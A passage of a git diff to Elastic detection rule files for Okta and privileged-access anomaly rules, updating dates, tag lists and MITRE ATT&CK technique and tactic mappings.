a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml index 2a87b962d34..8f3817af63a 100644 --- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml +++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/07" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -57,14 +57,7 @@ references = ["https://trust.okta.com/security-advisories/okta-classic-applicati risk_score = 47 rule_id = "1502a836-84b2-11ef-b026-f661ea17fbcc" severity = "medium" -tags = [ - "Domain: SaaS", - "Data Source: Okta", - "Use Case: Threat Detection", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide", -] +tags = ["Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Use Case: Threat Detection", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -78,17 +71,39 @@ event.dataset: "okta.system" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - [rule.new_terms] field = "new_terms_fields" value = ["client.user.name", "okta.client.user_agent.raw_user_agent"] diff --git a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml index 3cee4601d83..e85d24507ef 100644 --- a/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml +++ b/rules/integrations/okta/initial_access_suspicious_activity_reported_by_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -78,52 +78,3 @@ event.dataset:okta.system and event.action:user.account.report_suspicious_activi ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml index fdf12c3e90b..b81063de51f 100644 --- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml +++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/07" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,12 +68,7 @@ references = [ risk_score = 47 rule_id = "621e92b6-7e54-11ee-bdc0-f661ea17fbcd" severity = "medium" -tags = [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "threshold" @@ -87,22 +82,21 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.004" name = "Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1550/004/" - - [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.threshold] field = ["okta.actor.id"] value = 1 diff --git a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml index efa11cf5d96..d58958991d7 100644 --- a/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml +++ b/rules/integrations/okta/okta_threatinsight_threat_suspected_promotion.toml @@ -3,7 +3,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" promotion = true -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -37,7 +37,7 @@ risk_score = 47 rule_id = "6885d2ae-e008-4762-b98a-e8e1cd3a81e9" rule_name_override = "okta.display_message" severity = "medium" -tags = ["Use Case: Identity and Access Audit", "Data Source: Okta", "Resources: Investigation Guide"] +tags = ["Use Case: Identity and Access Audit", "Tactic: Credential Access", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -65,3 +65,31 @@ severity = "high" value = "HIGH" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.004" +name = "Credential Stuffing" +reference = "https://attack.mitre.org/techniques/T1110/004/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml index 859394bc1c4..6077dd8a367 100644 --- a/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml +++ b/rules/integrations/okta/persistence_administrator_privileges_assigned_to_okta_group.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,12 +70,7 @@ references = [ risk_score = 47 rule_id = "b8075894-0b62-46e5-977c-31275da34419" severity = "medium" -tags = [ - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -86,14 +81,36 @@ event.dataset:okta.system and event.action:group.privilege.grant [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml index 4e3bb956cee..14ed0422b6f 100644 --- a/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml +++ b/rules/integrations/okta/persistence_administrator_role_assigned_to_okta_user.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["okta"] maturity = "production" -updated_date = "2026/02/03" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -72,14 +72,7 @@ references = [ risk_score = 47 rule_id = "f06414a6-f2a4-466d-8eba-10f85e8abf71" severity = "medium" -tags = [ - "Domain: Identity", - "Data Source: Okta", - "Data Source: Okta System Logs", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Identity", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Okta", "Data Source: Okta System Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -92,14 +85,36 @@ event.dataset:okta.system [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml index 3d49244c971..b132c287c30 100644 --- a/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml +++ b/rules/integrations/okta/persistence_attempt_to_create_okta_api_token.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/21" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,14 +85,18 @@ event.dataset:okta.system and event.action:system.api_token.create [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml index 3f356b7f3ee..f3e560d02e4 100644 --- a/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml +++ b/rules/integrations/okta/persistence_mfa_deactivation_with_no_reactivation.toml @@ -2,7 +2,7 @@ creation_date = "2020/05/20" integration = ["okta"] maturity = "production" -updated_date = "2025/09/08" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,13 +66,7 @@ risk_score = 21 rule_id = "cd89602e-9db0-48e3-9391-ae3bf241acd8" setup = "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n" severity = "low" -tags = [ - "Tactic: Persistence", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Domain: Cloud", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Okta", "Domain: Cloud", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -85,19 +79,36 @@ sequence by okta.target.id with maxspan=12h [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml index b85da21efcb..24d114ed045 100644 --- a/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml +++ b/rules/integrations/okta/persistence_okta_attempt_to_modify_or_delete_application_sign_on_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/01" integration = ["okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,12 +70,7 @@ references = [ risk_score = 47 rule_id = "cd16fb10-0261-46e8-9932-a0336278cdbe" severity = "medium" -tags = [ - "Tactic: Persistence", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Data Source: Okta", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -86,14 +81,18 @@ event.dataset:okta.system and event.action:(application.policy.sign_on.update or [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.009" +name = "Conditional Access Policies" +reference = "https://attack.mitre.org/techniques/T1556/009/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml index b0edb92b585..22ef2ee2fc5 100644 --- a/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml +++ b/rules/integrations/okta/persistence_stolen_credentials_used_to_login_to_okta_account_after_mfa_reset.toml @@ -2,7 +2,7 @@ creation_date = "2023/11/09" integration = ["endpoint", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,16 +65,7 @@ references = [ risk_score = 73 rule_id = "5610b192-7f18-11ee-825b-f661ea17fbcd" severity = "high" -tags = [ - "Tactic: Persistence", - "Use Case: Identity and Access Audit", - "Data Source: Okta", - "Data Source: Elastic Defend", - "Rule Type: Higher-Order Rule", - "Domain: Endpoint", - "Domain: Cloud", - "Resources: Investigation Guide", -] +tags = ["Use Case: Identity and Access Audit", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Okta", "Data Source: Elastic Defend", "Rule Type: Higher-Order Rule", "Domain: Endpoint", "Domain: Cloud", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -87,19 +78,36 @@ sequence by user.name with maxspan=12h [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" + [[rule.threat.technique.subtechnique]] id = "T1556.006" name = "Multi-Factor Authentication" reference = "https://attack.mitre.org/techniques/T1556/006/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml index 95c5b7cbd46..fa9852ed253 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_count_privileged_process_events_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,14 +89,13 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml index cea8bce82f4..8147cfbf1d0 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_high_median_process_command_line_entropy_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -80,24 +80,22 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml index c25efcf1291..0640fa21d56 100644 --- a/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_linux_rare_process_executed_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "endpoint", "sysmon_linux"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -88,14 +88,13 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml index 225018502ae..35c3392fc78 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_high_sum_concurrent_sessions_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -79,29 +79,30 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml index 1387bf22786..d3c4657a878 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_host_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml index f79d485a9c4..54b379a95e8 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_region_name_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -89,14 +89,18 @@ tags = [ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml index 938ae0eef73..7783473fcb2 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_rare_source_ip_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -78,24 +78,22 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Initial Access", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml index f84ac248bfd..be3e4999263 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_application_assignment_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -78,34 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1068" -name = "Exploitation for Privilege Escalation" -reference = "https://attack.mitre.org/techniques/T1068/" [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml index 14c6f23bdb1..6d695a94ca5 100644 --- a/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml +++ b/rules/integrations/pad/privileged_access_ml_okta_spike_in_group_lifecycle_changes.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["pad", "okta"] maturity = "production" -updated_date = "2025/07/02" +updated_date = "2026/03/23" [rule] anomaly_threshold = 75 @@ -78,29 +78,30 @@ The Privileged Access Detection integration detects privileged access activity b - For this rule to work, complete the instructions through **Add preconfigured anomaly detection jobs**. """ severity = "low" -tags = [ - "Use Case: Privileged Access Detection", - "Rule Type: ML", - "Rule Type: Machine Learning", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Use Case: Privileged Access Detection", "Rule Type: ML", 